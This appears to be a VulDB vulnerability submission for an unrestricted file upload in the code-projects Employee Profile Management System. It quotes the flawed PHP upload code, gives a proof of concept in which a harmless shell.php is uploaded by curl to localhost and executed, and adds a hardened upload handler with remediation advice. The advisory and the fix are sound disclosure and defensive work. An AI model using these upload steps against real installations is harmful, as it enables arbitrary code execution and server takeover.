Submission #699247: code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload Info

Title: code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload
Description:

Summary
The vulnerability exists in the file upload component (Profiling/add_file_query.php) due to missing validation of uploaded file types and content. The application allows arbitrary files, including executable .php files, to be uploaded into a web-accessible directory.

Root Cause
The server stores uploaded files directly under Profiling/uploads/ using the original filename supplied by the client:

    $target_dir = "uploads/";
    $target_file = $target_dir . basename($_FILES["per_file"]["name"]);
    move_uploaded_file($_FILES["per_file"]["tmp_name"], $target_file);

There is no extension restriction, no MIME checking, no content inspection, no filename randomization, and the upload directory is inside the web root. basename() only strips directory components from the client-supplied name, so it prevents path traversal but does nothing about the extension. A user can therefore upload a PHP file that the server later executes.

Reproduction
Log in as a normal user who has access to the "Add File" feature.

Create the following file as shell.php:

    <?php echo "EXECUTED: " . __FILE__; ?>

Send the upload request (example using curl):

    curl -X POST "http://localhost/Profiling/add_file_query.php" \
      -F "per_name=1" \
      -F "per_file=@shell.php" \
      -F "upload=Save"

Access the uploaded file directly:

    http://localhost/Profiling/uploads/shell.php

The PHP code executes and prints the message, confirming arbitrary code execution.

Impact
Any remote attacker holding a normal user account that can reach the upload feature can upload and execute arbitrary PHP code on the server. Successful exploitation leads to full server compromise, including command execution, data theft, privilege escalation, and persistent backdoor installation.
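The following is an added example of how the upload handler could be hardened; it is not code from the project or from the submitter. It keeps the per_file field name from the report but assumes everything else: a storage directory outside the web root (hypothetical path private_uploads), an allow-list of PDF/PNG/JPEG (the page does not say which document types the feature is meant to accept), and a 5 MB size cap. The checks it adds are the ones the root-cause paragraph says are missing: extension allow-list, content-based MIME check, random on-disk name, and a non-web-accessible directory.

```php
<?php
// Hardened replacement for the upload logic in Profiling/add_file_query.php.
// Added example, not the project's code. Assumptions: the form field is still
// "per_file"; allowed types are PDF/PNG/JPEG; files are stored outside the web root.

declare(strict_types=1);

// Assumed location outside DocumentRoot: nothing placed here is executed or served directly.
const UPLOAD_DIR = __DIR__ . '/../../private_uploads';
const MAX_BYTES  = 5 * 1024 * 1024;

// Allow-list: extension => MIME type that the file's magic bytes must report.
const ALLOWED = [
    'pdf'  => 'application/pdf',
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
];

/**
 * Validates one entry of $_FILES and returns its allow-listed extension.
 * Throws RuntimeException on any failure; nothing is written to disk here.
 */
function validate_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or no file sent');
    }
    // Refuse anything that did not arrive through PHP's upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }

    // Extension check on the client-supplied name: last component, lower-cased.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('File type not allowed');
    }

    // Content check: inspect the bytes, never $_FILES['type'], which the client controls.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('File content does not match its extension');
    }
    return $ext;
}

/**
 * Stores a validated upload under a random name and returns that name.
 * The original filename is used only for the extension, never for the path.
 */
function store_upload(array $file): string
{
    $ext = validate_upload($file);
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        throw new RuntimeException('Storage directory unavailable');
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);   // readable by the web server only, never executable
    return $name;         // persist this (plus the display name) in the database
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['per_file'])) {
    try {
        $stored = store_upload($_FILES['per_file']);
        echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

With the file outside the web root, the application needs a separate download script that looks up the stored name in the database, sends the file with Content-Disposition: attachment and X-Content-Type-Options: nosniff, and never builds the path from user input. If the upload directory must stay under the web root for compatibility, additionally disable script execution there at the web server (for example, with mod_php on Apache, `php_flag engine off` in that directory's .htaccess); the allow-list and content check above still apply, since server-side execution is only one of the risks of serving user-supplied files.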
Source: https://github.com/shenxianyuguitian/employee-management-UFU
User: xuanyuesanshi (UID 88126)
Submitted: 2025-11-21 08:26 (5 months ago)
Moderation: 2025-12-06 18:22 (15 days later)
Status: Accepted
VulDB entry: 334615 [code-projects Employee Profile Management System 1.0 add_file_query.php per_file Privilege Escalation]
Points: 20
